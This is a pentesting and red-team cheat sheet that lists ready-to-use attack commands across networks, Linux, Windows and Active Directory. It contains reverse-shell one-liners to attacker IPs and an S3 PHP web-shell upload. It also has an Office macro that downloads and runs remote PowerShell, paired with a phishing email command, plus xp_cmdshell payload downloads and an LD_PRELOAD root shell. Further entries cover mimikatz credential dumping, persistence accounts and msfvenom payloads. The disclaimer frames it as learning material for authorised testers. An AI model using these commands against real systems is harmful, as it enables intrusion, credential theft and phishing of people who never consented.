VAPT Notes

Disclaimer : This cheat sheet has been compiled from multiple sources with the objective of aiding fellow pentesters and red teamers in their learning. The credit for all the tools and techniques belongs to their original authors.

Network

Network Enumeration

Host Discovery

# 63 ttl = linux 
# 127 ttl = windows
$ ping $IP 

# disable port scan and enumerate only subnet
$ sudo nmap -sn $IP/24 

# disables ping command and only scans ports 
$ sudo nmap -p- --min-rate 1000 $IP -Pn 
$ sudo nmap -sU -p- --min-rate 1000 $IP -Pn

# Scan network ranges
$ sudo nmap $IP/24 -sn -oA filename | grep for | cut -d" " -f5 
# Scan network ranges on a predefined ip list
$ sudo nmap -sn -oA filename -iL hosts.lst | grep for | cut -d" " -f5 

Advanced Network Scans

# Typical scans for open ports found
$ sudo nmap -p <ports> -sV -sC -A $IP -oN nmap_servers
$ sudo nmap -sU -p <ports> -sV -sC -A $IP -oN nmap_servers

# Stealthy scans
$ sudo nmap -sS -p- --min-rate=1000 $IP -Pn

# Try to connect to filtered port
$ ncat -nv --source-port 53 $IP <port>

# Scan using decoys
$ sudo nmap $IP -p- -sS -Pn -n --disable-arp-ping --packet-trace -D RND:5

# Scan by using different specific IP address
$ sudo nmap $IP -p 445 -Pn -n -O -S $allowed_ip -e tun0 

# SYN-Scan filtered ports From DNS port
$ sudo nmap $IP -p- -sS -Pn -n --disable-arp-ping --source-port 53

# Other DNS proxying techniques
$ sudo nmap $IP -p50000 --source-port 53
$ netcat -nv --source-port 53 $IP 50000

Port Enumeration

FTP | Port 21

# Try to connect to FTP
$ ftp -A $IP
$ ftp $IP

# Set transmission to binary instead of ascii
ftp> binary
# Put file to FTP
ftp> put winPEASx86.exe

# Brute force FTP
$ hydra -l user -P /usr/share/wordlists/rockyou.txt $IP -t 4 ftp

# Download all files from FTP
$ wget -r ftp://user:pass@$IP/

SSH | Port 22

$ nc -nvlp 443
$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa user@$IP -t 'bash -i >& /dev/tcp/$OUR_IP/443 0>&1'

# Brute force SSH
$ hydra -l user -P /usr/share/wfuzz/wordlist/others/common_pass.txt $IP -t 4 ssh
$ hydra -L users.txt -p password $IP -t 4 ssh -s <port>

# Change permissions of private key
$ chmod 600 id_rsa
$ ssh user@$IP -i id_rsa

# Convert key to hash for cracking
$ ssh2john id_ecdsa > id_ecdsa.hash
# Crack hash
$ john --wordlist=/usr/share/wordlists/rockyou.txt id_ecdsa.hash

Telnet | Port 23

$ telnet -l user $IP

SMTP | Port 25

$ nc -nv $IP 25
$ telnet $IP 25

DNS | Port 53

# DNS zone transfer
$ dnsrecon -d domain_name -n $IP -t axfr

# Fetch name servers
$ dig +noall +answer -t NS target.com 
# Fetch exchange servers
$ dig +noall +answer -t MX target.com 
# Interrogate a specified domain name server
$ dig +noall +answer -t ANY target.com @ns.target.com 
# Fetch the zone file for a specified domain name server
$ dig +noall +answer -t AXFR target.com @ns.target.com 
# Reverse DNS lookup
$ dig +noall +answer -x 192.168.8.5 

# Subdomain brute force
$ gobuster dns -t 30 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -d website.site

HTTP(S) | Ports 80, 443

# Check robots.txt, sitemap.xml, crossdomain.xml, clientaccesspolicy.xml, .well-known.xml

# If there is /cgi-bin endpoint, try shellshock

$ whatweb -a 3 $IP
$ nikto -ask=no -h http://$IP 2>&1

$ dirsearch -w /usr/share/seclists/Discovery/Web-Content/common.txt -e html,php,txt,asp,aspx,sh,cgi,pl,py,bak,sql,old,zip -x 400,401,402,403,404 -u 10.10.10.10

$ gobuster dir -u http://$IP/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x html,php,txt,asp,aspx,sh,cgi,pl,py,bak,sql,old,zip -b 404,403,400,402,401
$ gobuster dir -u http://$IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt,asp,aspx,sh,cgi,pl,py,bak,sql,old,zip

$ feroxbuster -u http://$IP/ -t 30 -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt -x "html,php,txt,asp,aspx,sh,cgi,pl,py,bak,sql,old,zip" -v -k -n -e --auto-tune
$ feroxbuster -u http://$IP:8000/cms/ -t 30 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "html,php,txt,asp,aspx,sh,cgi,pl,py,bak,sql,old,zip" -v -k -n -e -C 404 # if we dont want to see any denied
$ feroxbuster -u http://$IP:8000/cms/ -t 30 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "html,php,txt,asp,aspx,sh,cgi,pl,py,bak,sql,old,zip" -v -k -n -e -C 404,302 # if website redirects

$ curl http://$ip/api/
$ curl http://$ip/api/user/v1/
$ curl http://$ip/api/user/v2/

# Fuzzing
$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://$IP/FUZZ
$ ffuf -u http://www.target.com -H "Host: FUZZ.target.com" -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -ac
# Fuzzing get parameters
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -fs xxx -u 'http://target.com/admin/admin.php?FUZZ=key' 
# Fuzzing post parameters
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://target.com/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx 
# Fuzzing vhosts
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://$IP -H "HOST: FUZZ.website.com" -fs 10918 
# Fuzzing subdomains
$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.website.htb/ 
# Fuzzing post parameter values
$ ffuf -w ids.txt:FUZZ -u http://target.com/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx 
# Fuzzing get parameter values
$ ffuf -w ids.txt:FUZZ -fs xxx -u 'http://target.com/admin/admin.php?id=FUZZ'

# Login Brute Force
$ hydra -l admin -P rockyou.txt $IP http-post-form "/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed" -V

# Wordpress Scan
$ wpscan --url https://$IP --random-user-agent --ignore-main-redirect --api-token <token>

# AWS Web Service Bucket
$ aws configure
$ aws --endpoint=http://s3.abc.com s3 ls
$ aws --endpoint=http://s3.abc.com s3 ls s3://abc.com
$ echo '<?php system($_GET["cmd"]); ?>' > shell.php
$ aws --endpoint=http://s3.abc.com  s3 cp shell.php s3://abc.com
$ curl http://abc.com/shell.php?cmd=id
$ nc -nvlp 1234
$ rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.108+1234+>/tmp/f

SMB | Ports 139, 445

$ smbclient -L \\$IP -U "" -N -p 12445
$ smbclient '//$IP/C' -p 12445

$ smbmap -H $IP
$ smbmap -u "username" -p "password" -H $IP
$ smbmap -H $IP -u null

$ enum4linux -a -M -l -d $IP 2>&1
$ enum4linux -a -u "" -p "" $IP && enum4linux -a -u "guest" -p "" $IP

$ nxc smb $IP
$ nxc smb $IP -u "" -p "" --shares
$ nxc smb $IP -u 'guest' -p '' --users
$ nxc smb $IP -u users.txt -p 'Pass!' --local-auth --continue-on-success
$ nxc smb $IP -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec
$ nxc smb $IP/24 -u administrator -p 'Password123!' --loggedon-users
$ nxc smb $IP -u administrator -p 'Password123!' --sam
$ nxc smb $IP -u Administrator -H <hash>
$ nxc smb dc.abc.org -u '' -p '' --shares
# spider and export all files
$ nxc smb $IP -u 'user' -p 'pass' -M spider_plus -o DOWNLOAD_FLAG=True
# list all files
$ nxc smb $IP -u 'user' -p 'pass' -M spider_plus

$ impacket-psexec administrator:'Password123!'@$IP

SNMP | Port 161 UDP

$ nmap --script snmp-* -sU -p161 $IP
$ snmpwalk -c public -v1 $IP
$ snmpcheck -t $IP -c public # Better than snmpwalk
$ snmpwalk -c public -v1 -t 10 $IP # Displays entire MIB tree 

#Windows MIB values
1.3.6.1.2.1.25.1.6.0 - System Processes
1.3.6.1.2.1.25.4.2.1.2 - Running Programs
1.3.6.1.2.1.25.4.2.1.4 - Processes Path
1.3.6.1.2.1.25.2.3.1.4 - Storage Units
1.3.6.1.2.1.25.6.3.1.2 - Software Name
1.3.6.1.4.1.77.1.2.25 - User Accounts
1.3.6.1.2.1.6.13.1.3 - TCP Local Ports
$ snmpwalk -c public -v1 $IP <MIB>

LDAP | Port 389, 636, 3268, 3269

$ ldapsearch -x -H ldap://<IP>:<port> # try on both ldap and ldaps
$ ldapsearch -x -H ldap://$IP -s base namingcontexts
...
dn:
namingcontexts: DC=hutch,DC=offsec
namingcontexts: CN=Configuration,DC=hutch,DC=offsec
...
$ ldapsearch -x -H ldap://$IP -b "DC=hutch,DC=offsec"
$ ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
$ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
# CN name describes the info we want to collect
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
$ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"
$ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
$ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
$ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
$ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
$ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"

# https://github.com/ropnop/windapsearch
$ python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --computers
$ python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --groups
$ python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --da
$ python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --privileged-users

$ nxc ldap $IP -u '' -p '' -M get-desc-users
$ nxc ldap $IP -u '' -p '' --password-not-required --admin-count --users --groups

MSSQL | Port 1433

$ proxychains nxc mssql -d domain_name -u user -p password -x "whoami" $IP
$ proxychains nxc mssql -d domain_name -u user -p password -x "whoami" $IP -q 'SELECT name FROM master.dbo.sysdatabases;'

mssql> EXEC SP_CONFIGURE 'show advanced options', 1
mssql> EXEC SP_CONFIGURE 'xp_cmdshell' , 1
mssql> xp_cmdshell 'whoami'
mssql> xp_cmdshell 'powershell "Invoke-WebRequest -Uri http://$IP:1337/shell.exe -OutFile c:\Users\Public\shell.exe"'
mssql> xp_cmdshell 'c:\Users\Public\shell.exe"'

NFS | Port 2049

$ nmap -sV --script=nfs-showmount $IP

# Show available NFS shares
$ showmount $IP
$ showmount -e $IP
# Mount NFS share
$ mkdir temp 
$ mount -t nfs -o vers=3 $IP:/home temp -o nolock
$ cd temp
$ tree.

Linux

Linux Enumeration

# UPGRADE YOUR SHELL WHEN YOU GAIN ACCESS TO A SYSTEM!
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
# or 
$ script /dev/null -c bash

$ uname -a
$ cat /etc/issue
$ cat /etc/*-release
$ sudo -l
$ ls -lsaht /etc/sudoers
$ groups <user>
$ env
$ find / -perm -u=s -type f 2>/dev/null
$ find / -perm -g=s -type f 2>/dev/null
$ netstat -antup
$ netstat -tunlp

Credential Hunting

# https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation
# files that were edited in the past 10 mins
$ find / -mmin -10 2>/dev/null | grep -Ev "^/proc"

# in memory passwords
$ strings /dev/mem -n10 | grep -i PASS

# find sensitive files
$ locate password | more
$ find / -name authorized_keys 2> /dev/null
$ find / -name id_rsa 2> /dev/null

Privilege Escalation

# find SUID binaries
$ find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
$ find / -uid 0 -perm -4000 -type f 2>/dev/null

$ sudo -l

# If LD_PRELOAD is explicitly defined in the sudoers file
$ cat shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/sh");
}

$ gcc -fPIC -shared -o shell.so shell.c -nostartfiles
$ sudo LD_PRELOAD=<full_path_to_so_file> <program>

Persistence

$ adduser <uname> # Interactive
$ useradd <uname>
$ useradd -u <UID> -g <group> <uname>  # UID can be anything... this command is to add a user to a specific group

# Adding SSH public key
$ ssh-keygen -t rsa -b 4096 

# This creates both id_rsa and id_rsa.pub in ~/.ssh directory
# Copy the content in "id_rsa.pub" and create ".ssh" directory in /home of target machine
$ chmod 700 ~/.ssh
$ nano ~/.ssh/authorized_keys # enter the copied content here
$ chmod 600 ~/.ssh/authorized_keys

Windows

Phishing

Malicious Macro

Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadString('http://x.x.x.x/run.ps1') | IEX"
    Shell str, vbHide
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Sending Phishing Email

$ swaks --header "Subject: <subject>" --body "<body>" -t to_who@email.com -f from_who@email.com --server x.x.x.x --attach malicious.docm

Windows Enumeration

PS C:\> systeminfo
PS C:\> hostname
PS C:\> whoami
PS C:\> net users # local users
PS C:\> net users /domain # all users on Domain
PS C:\> net localgroups
PS C:\> net user user1 # more info about user1
PS C:\> net group /domain # enumerate all groups on the domain
PS C:\> net group /domain "group1" # more info about group1
PS C:\> netsh firewall show state
PS C:\> netsh firewall show config
PS C:\> ipconfig /all
PS C:\> route print
PS C:\> arp -A # look for IPs that your victim is connected

Credentials Hunting

PS C:\> Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
PS C:\> Get-ChildItem -Path C:\Users -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
PS C:\> Get-ChildItem -Path C:\Users\user1\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction
PS C:\> tree /f C:\Users\ # look for interesting files, backups etc.
PS C:\> Get-History
PS C:\> (Get-PSReadlineOption).HistorySavePath
PS C:\> type <path>

Exploitation

Binary Hijacking

PS C:\> icalcs "path" # check for F (full permission)
PS C:\> sc qc <servicename>
PS C:\> sc config <service> <option>="<value>" # change the path to the reverseshell location
PS C:\> sc start <servicename>

Unquoted Service Path

PS C:\> wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
PS C:\> icalcs "path" # check for writeable permission
# Replace the executable in the service folder and start the service
PS C:\> sc start <servicename>

Insecure Service Executables

PS C:\> icalcs "path" # File Permissions: Everyone [AllAccess]
# Replace the executable in the service folder and start the service
PS C:\> sc start <service>

Weak Registry Permissions

PS C:\> accesschk /acceptula -uvwqk HKLM\system\currentcontrolset\services\<service> # Check for KEY_ALL_ACCESS
PS C:\> reg query HKLM\system\currentcontrolset\services\<service>
PS C:\> reg add HKLM\SYSTEM\CurrentControlSet\services\<service> /v ImagePath /t REG_EXPAND_SZ /d reverse.exe /f
PS C:\> net start <service>

DLL Hijacking

# use Procmon to check for missing dlls (“NAME NOT FOUND”)
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attaker-IP> LPORT=<listening-port> -f dll > filename.dll

Scheduled Tasks

PS C:\> schtasks /query /fo LIST /v | findstr /B /C:"Folder" /C:"TaskName" /C:"Run As User" /C:"Schedule" /C:"Scheduled Task State" /C:"Schedule Type" /C:"Repeat: Every" /C:"Comment"
PS C:\> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
PS C:\> schtasks /query /fo LIST | Where-Object {$_ -like "TaskName*"} | select-string "privilege"
PS C:\> icalcs <path> # need to be writeable

Privilege Escalation

# https://github.com/CCob/SweetPotato
PS C:\> .\SweetPotato.exe -e EfsRpc -p c:\Users\Public\nc.exe -a "$KALI_IP 1234 -e cmd"

# https://github.com/BeichenDream/GodPotato/releases
PS C:\> .\GodPotato.exe -cmd "cmd /c whoami"
PS C:\> .\GodPotato.exe -cmd "shell.exe"

Persistence

PS C:\> net user administrator password
PS C:\> net localgroup Administrators hacker /add
PS C:\> net localgroup "Remote Desktop Users" hacker /ADD

Active Directory

https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet

https://swisskyrepo.github.io/InternalAllTheThings/

AD Enumeration

$ impacket-GetADUsers -dc-ip $DC_IP "domain.name/" -all 
$ impacket-GetADUsers -dc-ip $DC_IP domain.name/username:password -all

PS C:\> net user /domain
PS C:\> net user <user> /domain
PS C:\> net group /domain
# Download and use PowerView
PS C:\> curl https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 -o PowerView.ps1
PS C:\> ..\PowerView.ps1
# Get members of local group (PowerView)
PS C:\> Get-NetLocalGroup -ComputerName <domain> -Recurse
# Find DC hostname
PS C:\> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

Secrets Dumping

$ impacket-secretsdump Administrator:'password'@$IP -outputfile hashes

PS C:\> ./mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
PS C:\> ./mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "vault::cred /patch" "exit"
PS C:\> .\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::msv" "lsadump::sam" "exit"

# Leverage ScriptBlock
PS C:\> $sess = New-PSSession -ComputerName <hostname>
PS C:\> Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
PS C:\> iex (iwr http://$IP/Invoke-Mimikatz.ps1 -UseBasicParsing)
PS C:\> Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess

$ nxc smb $IP/24 -u -u 'user' -p 'pass' --sam
$ nxc smb $IP/24 -u 'user' -p 'pass' --lsa
$ nxc smb $IP -u 'user' -p 'pass' --ntds
$ nxc smb $IP -u 'user' -p 'pass' --ntds --users
$ nxc smb $IP -u 'user' -p 'pass' --ntds --users --enabled
$ nxc smb $IP -u 'user' -p 'pass' --ntds vss

meterpreter> load kiwi
meterpreter> creds_msv

AD Exploitation

$ nxc smb $IP -u users.txt -p 'password' -d domain.name --continue-on-success
$ nxc smb $IP -u user -p 'password' -d domain.name
$ nxc smb $IP -u users.txt -p pass.txt -d domain.name --continue-on-success
$ proxychains nxc smb $IP -u Administrator -p password -x whoami --local-auth
$ proxychains nxc winrm $IP -u Administrator -p password -x whoami --local-auth
$ nxc winrm $IP -u users.txt -p 'password' -d domain.name --continue-on-success
$ nxc winrm $IP -u user -p 'password' -d domain.name
$ nxc winrm $IP -u users.txt -p pass.txt -d domain.name --continue-on-succes
$ proxychains nxc mssql -d domain.name -u user -p password -x "whoami" $IP

# SMB Execute commands on behalf of other users
$ nxc smb $IP -u <localAdmin> -p <password> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command>
$ netexec smb $IP -u Username -p Password -X 'powershell -e <base64_encoded_payload>'

# Dump file for bloodhound
$ nxc ldap $IP -u user -p pass --bloodhound -ns <ns-ip> --collection All

# AS-REP ROAST
$ nxc ldap $IP -u user -p '' --asreproast output.txt
$ nxc ldap $IP -u user.txt -p '' --asreproast output.txt

# Kerberoast
$ nxc ldap $IP -u user -p pass --kerberoasting output.txt

PS C:\> Add-DomainGroupMember -Identity 'SQLManagers' -Members 'user'
PS C:\> Get-NetGroupMember -GroupName 'SQLManagers'

Persistence

PS C:\> net user <user> <password> /add
PS C:\> net localgroup Administrators <user> /add
PS C:\> net localgroup "Remote Management Users" <user> /add
PS C:\> net localgroup "Remote Desktop Users" <user> /add
PS C:\> Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
PS C:\> Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

Lateral Movement

PS C:\> runas /user:<hostname>\<user> cmd

ligolo-ng

Sources: 1, 2, 3

Create TUN Interfaces

# Download the proxy and agent from https://github.com/nicocha30/ligolo-ng/releases/

# Create new tun interfaces
kali$ sudo ip tuntap add user <username> mode tun ligolo1
kali$ sudo ip link set ligolo1 up

kali$ sudo ip tuntap add user <username> mode tun ligolo2
kali$ sudo ip link set ligolo2 up

kali$ sudo ip tuntap add user <username> mode tun ligolo3
kali$ sudo ip link set ligolo3 up

# Confirm that your new interfaces are up
kali$ ip a

# Start the proxy on Kali machine
kali$ ligolo-proxy -selfcert

First Pivot (Kali --> ligolo1)

# Windows
ligolo1 cmd> ./agent.exe -connect <kali_ip>:11601 -ignore-cert

# Linux
ligolo1$ chmod +x agent && ./agent -connect <kali_ip>:11601 -ignore-cert

# Starting our Pivot
# Choose a session
ligolo-ng$ session
# Verify network instances on connected agent
ligolo1_agent$ ifconfig
ligolo1_agent$ start

# Add a new route (ligolo1 subnet) to our proxy
kali$ sudo ip route add 192.168.8.0/24 dev ligolo1
# Confirm that the route was added
kali$ ip route
# Try pinging the internal server now
kali$ ping 192.168.8.129

# Do a ping sweep to find ligolo2
kali$ for i in {1..254}; do (ping -c 1 192.168.8.$i) | grep "bytes from" &) ;done

# Forward traffic from port 8080 on ligolo1 to port 80 on our Kali
ligolo1_agent$ listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:80 --tcp
ligolo1_agent$ listener_list

Second Pivot (Kali --> ligolo1 (Jump Host) --> ligolo2)

# On ligolo2, download netcat from Kali through ligolo1
ligolo2 cmd> certutil -urlcache -f http://<ligolo1_ip>:8080/nc.exe nc.exe

# Forward traffic from port 4444 on ligolo1 to port 444 on our Kali
ligolo1_agent$ listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:444 --tcp
ligolo1_agent$ listener_list

# Execute netcat on ligolo2 to connect back to us through ligolo1
ligolo2 cmd> ./nc.exe <ligolo1_ip> 4444 -e cmd.exe

# Catch the reverse shell our kali 
kali$ nc -nlvp 444

# Upload agent to ligolo2
ligolo2 cmd> certutil -urlcache -f http://<ligolo1_ip>:8080/agent.exe agent.exe

# To run Agent on ligolo2, we must create a new listener on ligolo1
ligolo1_agent$ listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp

# Execute Agent on ligolo2
ligolo2 cmd> ./agent.exe -connect <ligolo1_ip>:11601 -ignore-cert

# Start the tunnel on Ligolo proxy
ligolo-ng$ session # find ligolo2 agent
ligolo2_agent$: start --tun ligolo2
ligolo2_agent$ ifconfig

# Add a new route (ligolo2 subnet) to our proxy
kali$ sudo ip route add 192.186.119.0/24 dev ligolo2

# Do a ping sweep to find ligolo3
kali$ for i in {1..254}; do (ping -c 1 192.168.119.$i) | grep "bytes from" &) ;done

We can also use nxc:

nxc smb <ligolo2_ip> -u user -H hash -x 'certutil -f -urlcache http://<kali_ip>:8080/tools/ligolo/ligolo-ng_agent_windows_amd64/agent.exe c:\windows\system32\agent.exe'

nxc smb <ligolo2_ip> -u user -H hash -x 'c:\windows\system32\agent.exe -connect <ligolo1_ip>:11601 -ignore-cert'

Third Pivot

# On ligolo3, download netcat from Kali through ligolo2
ligolo3 cmd> certutil -urlcache -f http://<ligolo2_ip>:8080/nc64.exe nc.exe

# Forward traffic from port 9090 on ligolo2 to port 999 on our Kali
ligolo2_agent> listener_add -addr 0.0.0.0:9090 --to 127.0.0.1:999 --tcp

# Execute netcat on ligolo3 to connect back to us through ligolo2
ligolo3 cmd> .\nc.exe <ligolo2_ip> 9090 -e cmd.exe

# Catch the reverse shell from ligolo3
kali$ nc -nlvp 999

# Upload agent to ligolo3
ligolo3 cmd> certutil -urlcache -f http://<ligolo2_ip>:8080/agent.exe agent.exe

ligolo2_agent> listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp

ligolo3 cmd> .\agent.exe -ignore-cert -connect <ligolo2_ip>:11601

ligolo2_agent> session # choose ligolo 3
ligolo3_agent> ifconfig
ligolo3_agent> start --tun ligolo3

kali$ sudo ip route add 192.168.79.0/24 dev ligolo3

kali$ ping 192.168.79.128

Using SSH

Referenced from https://notes.benheater.com/books/network-pivoting/page/ssh-port-forwarding

SSH Local Port to Remote Port (-L)

Purpose: Access remote services from your local machine.

Example:

• Local Port: 127.0.0.1:43306 on the attack box.
• Remote Port: 127.0.0.1:3306 on the target machine.
• Traffic sent to 127.0.0.1:43306 on the attack box is forwarded to 127.0.0.1:3306 on the remote server.

$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -L attack-ip:attack-port:remote-ip:remote-port -i /path/to/private-key user@target

$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -L 127.0.0.1:43306:127.0.0.1:3306 user@target

# Once configured
local$ mysql -u username -p -h 127.0.0.1 -P 43306
local$ curl http://127.0.0.1:43306

SSH Remote Port to Local Port (-R)

Purpose: Allow remote machines to access services on your local machine.

Example:

• Remote Port: 127.0.0.1:43306 on the target machine.
• Local Port: 127.0.0.1:3306 on the attack box.
• Traffic sent to 127.0.0.1:43306 on the target is forwarded to 127.0.0.1:3306 on the attack box.

$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port:local-ip:local-port -i /path/to/private/key user@attack-box-ip

$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R 127.0.0.1:43306:127.0.0.1:3306 user@attack-box-ip

# Once configured
remote$ mysql -u username -p -h 127.0.0.1 -P 43306

SSH Forward Dynamic SOCKS Proxy

Purpose: Create a proxy for accessing multiple hosts via the target dynamically.

Example:

• SOCKS Proxy: 127.0.0.1:50001 on the attack box.
• Any traffic configured to use this proxy is routed via the target, making it useful for accessing multiple remote hosts dynamically.

$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D attack-ip:attack-port -i /path/to/private-key user@target

$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D 127.0.0.1:50001 user@target

# Once configured + edit proxychains
local$ proxychains curl http://remote_example.com

SSH Reverse Dynamic SOCKS Proxy

Purpose: Provide a proxy on the remote machine to access multiple local hosts.

Example:

• SOCKS Proxy: 127.0.0.1:50001 on the target machine.
• Any traffic configured to use this proxy on the target machine is routed via your local machine.

$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port -i /path/to/private-key user@attack-box-ip

$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R 127.0.0.1:50001 user@attack-box-ip

# Once configured + edit proxychains
remote$ proxychains http://local_example.com

AV Evasion

https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/

General

virtualenv

# sudo apt-get install virtualenv
$ virtualenv myenv # create virutal environment
$ source myenv/bin/activate # activate the virutal environment
$ deactivate # deactivate the virutal environment

base64

$ base64 -w0 <file> ; echo
$ cat <file> | base64 -d 

Connecting to Target

$ rlwrap -cAr nc -lnvp 443

$ evil-winrm -i $IP -u username -p password
$ evil-winrm -i $IP -u username -H "<hash>"

$ busybox nc $IP 1234 -e sh

$ ssh username@$IP

$ smbclient -U username \\\\$IP\\SHARENAME

Reverse Shells

msfvenom

# EXE 32 bit
$ msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe

# EXE 64 bit
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

# ASP
$ msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp

# JSP
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp

# War
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

# PHP
$ msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php

One-Liners

$ bash -i >& /dev/tcp/$IP/4242 0>&1

$ python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$IP",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

<?php echo shell_exec('bash -i >& /dev/tcp/$IP/443 0>&1');?>

Text Manipulation

# search for the files that contains the phrase password in it
$ grep -ir password
$ grep -iRl "password" ./

# exclude multiple strings
$ grep -Ev 'exclude1 | exclude2' filename.txt

# obtain only lines starting with small letters
$ grep -v '[A-Z]' users.txt

# search and replace strings
$ cat username.txt | sed s/{stringToBeChanged}/{replacementString}/g

curl

# upload files via curl
$ curl --user "{user}:{creds}" --upload-file=<file> "http://$IP/upload_location"

$ curl http://$IP -o index.html

# pipe the requesting files
$ curl http://$IP:$PORT:lin(peas\|enum).sh | bash

# proxy request
